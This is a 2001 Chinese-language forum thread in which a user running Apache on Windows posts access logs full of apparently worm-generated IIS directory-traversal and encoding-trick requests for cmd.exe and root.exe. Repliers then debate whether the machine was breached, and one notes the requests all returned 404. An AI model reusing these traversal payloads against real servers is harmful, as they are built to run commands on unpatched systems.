最近是不是有新版的紅色警戒，請看我的LOG

**ba88ms21** · 2001-09-19, 02:59 PM

61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.24.46 - - [19/Sep/2001:14:54:36 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.140.33 - - [19/Sep/2001:14:54:37 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.140.33 - - [19/Sep/2001:14:55:00 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.140.33 - - [19/Sep/2001:14:55:06 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.140.33 - - [19/Sep/2001:14:55:11 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.140.33 - - [19/Sep/2001:14:55:23 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.24.46 - - [19/Sep/2001:14:55:24 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.24.46 - - [19/Sep/2001:14:55:49 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.14.22 - - [19/Sep/2001:14:55:53 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.14.22 - - [19/Sep/2001:14:55:55 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.36.174 - - [19/Sep/2001:14:57:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:47 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:57:48 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:57:50 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:57:52 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:58:18 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:58:22 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
61.216.36.174 - - [19/Sep/2001:14:58:25 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:28 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:32 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:38 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.186.37 - - [19/Sep/2001:14:58:43 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.186.37 - - [19/Sep/2001:14:58:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.186.37 - - [19/Sep/2001:14:58:51 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:58:51 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.186.37 - - [19/Sep/2001:14:58:53 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.186.37 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:59:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.186.37 - - [19/Sep/2001:14:59:04 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:59:08 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.186.37 - - [19/Sep/2001:14:59:09 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.186.37 - - [19/Sep/2001:14:59:11 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
61.216.92.80 - - [19/Sep/2001:14:59:13 +0800] "GET /cy/newimage.js HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/style.css HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/await.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/logo.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/pix.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/sun.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/print.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/friend.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/news.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/compaq.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/vote.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/result.gif HTTP/1.1" 304 -
61.216.186.37 - - [19/Sep/2001:14:59:16 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

**Ares** · 2001-09-19, 04:18 PM

若沒猜錯的話....
你是用NT4.0 OR WIN2000吧.
你有用IIS架WEB Server嗎?
若沒有拜託移除吧~~~~~~~~~~~~~~
有人跑到你的c槽去了.....
在網路上隨便找就有一堆有裝IIS卻毫無防備的PC.....
就連駭客功力連初級都稱不上的人(像是我)都可以入侵.
真是搞不懂為什麼有這麼多個人用戶不架Web還裝2000 server,像我裝perfessional不就很好嗎~~~

**ba88ms21** · 2001-09-19, 04:29 PM

不是，我是用apache for win32的，請問這是什麼情況呀

**maxtk** · 2001-09-19, 04:57 PM

最初由 Ares
若沒猜錯的話....
你是用NT4.0 OR WIN2000吧.
你有用IIS架WEB Server嗎?
若沒有拜託移除吧~~~~~~~~~~~~~~
有人跑到你的c槽去了.....
在網路上隨便找就有一堆有裝IIS卻毫無防備的PC.....
就連駭客功力連初級都稱不上的人(像是我)都可以入侵.
真是搞不懂為什麼有這麼多個人用戶不架Web還裝2000 server,像我裝perfessional不就很好嗎~~~

有切到C槽嗎? 看清楚一點吧..一堆404....-.-